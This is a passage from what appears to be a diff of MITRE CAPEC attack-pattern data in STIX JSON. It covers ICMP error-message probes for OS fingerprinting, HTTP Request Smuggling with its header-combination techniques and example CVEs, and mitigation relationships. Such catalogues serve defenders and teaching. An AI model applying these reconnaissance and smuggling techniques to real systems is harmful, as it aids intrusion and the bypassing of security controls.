analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-33", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/33.html" + }, + { + "external_id": "CWE-444", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/444.html" + }, + { + "description": "HTTP Request Smuggling", + "external_id": "26", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Smuggling" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Smuggling, 2010--01, The Web Application Security Consortium", + "external_id": "REF-672", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling" + }, + { + "description": "Dzevad Alibegovic, HTTP Request Smuggling: Complete Guide to Attack Types and Prevention, 2021--08---23, NeuraLegion", + "external_id": "REF-673", + "source_name": "reference_from_CAPEC", + "url": "https://www.neuralegion.com/blog/http-request-smuggling-hrs/" + }, + { + "description": "Busra Demir, A Pentester’s Guide to HTTP Request Smuggling, 2020--10---15, Cobalt", + "external_id": "REF-674", + "source_name": "reference_from_CAPEC", + "url": "https://cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling" + }, + { + "description": "Edi Kogan, Daniel Kerman, HTTP Desync Attacks in the Wild and How to Defend Against Them, 2019--10---29, Imperva", + "external_id": "REF-678", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/" + }, + { + "description": "James Kettle, HTTP Desync Attacks: Request Smuggling Reborn, 2019--08---07, PortSwigger", + "external_id": "REF-681", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn" + }, + { + "description": "HTTP request smuggling, PortSwigger", + "external_id": "REF-682", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling" + }, + { + "description": "Finding HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-683", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/finding" + }, + { + "description": "Exploiting HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-684", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/exploiting" + } + ], + "id": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Smuggling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "HTTP Desync" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287\n ", + "\n When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276\n ", + "\n Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both \"Content-Length\" and a \"Transfer-Encoding: chunked\" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with \"Transfer-Encoding: chunked\" header without replacing the existing \"Content-Length\" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with \"Content-Length: 0\". See also: CVE-2005-2088\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent.\n From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences.\n \n For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent.\n For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. .\n \n
    \n Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server).\n Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Request Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n A maliciously crafted HTTP request, which contains a second secretly embedded HTTP request is interpreted by an intermediary web proxy as single benign HTTP request, is forwarded to a back-end server, that interprets and parses the HTTP request as two authorized benign HTTP requests bypassing security controls.\n This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]\n Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.\n This differs from CAPEC-273 HTTP Response Smuggling, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Smuggling is an attempt to compromise aback-end HTTP agentvia HTTP Request messages.\n HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974" + ], + "x_capec_prerequisites": [ + "An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6100503-6f80-4635-b9dd-c9d1788158b5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad42c576-3139-4cee-ab82-749f0c506f57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd575ece-d038-4eb4-82d2-cc0b2717655b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b0b8cc-d674-4ba6-979e-cae5adc89a5c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa2cd65-f8bc-45da-a757-06ea485a0d3e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d84e072-1001-4113-b462-004ab68ea8da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ea59df1-f9e8-49e5-9fb1-39d689fd42cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc7176bc-62c9-4fad-9036-5f5079477a3a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78d6512c-86fb-4c96-b8f0-bebd67b26ece", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9475a8b1-13bc-4b75-b6b8-af4040ec7469", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ec4cb3d-85a3-4f13-b540-d74a0a2024e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8357749-6d25-4561-9c20-f8f937fb10f0", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82300401-dfdb-4a55-b612-2e17989ee4ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bf4c2215-7fc8-46bd-9caf-9f6fc4c1c877", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d07b5f41-bbd9-40f6-bd22-173bd6398815", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \"Quoted\" from the originating request that generated the error message.", + "external_references": [ + { + "external_id": "CAPEC-330", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--420d73c3-133c-487e-a98a-6050e7680243", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Echoing Integrity Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable\" error message. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.", + "external_references": [ + { + "external_id": "CAPEC-331", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--d9629af2-d5c2-4198-b80f-281cc7d04422", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP Total Length Field Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "external_id": "CAPEC-332", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--e02f436a-486e-409a-adc6-a058c531f05f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], 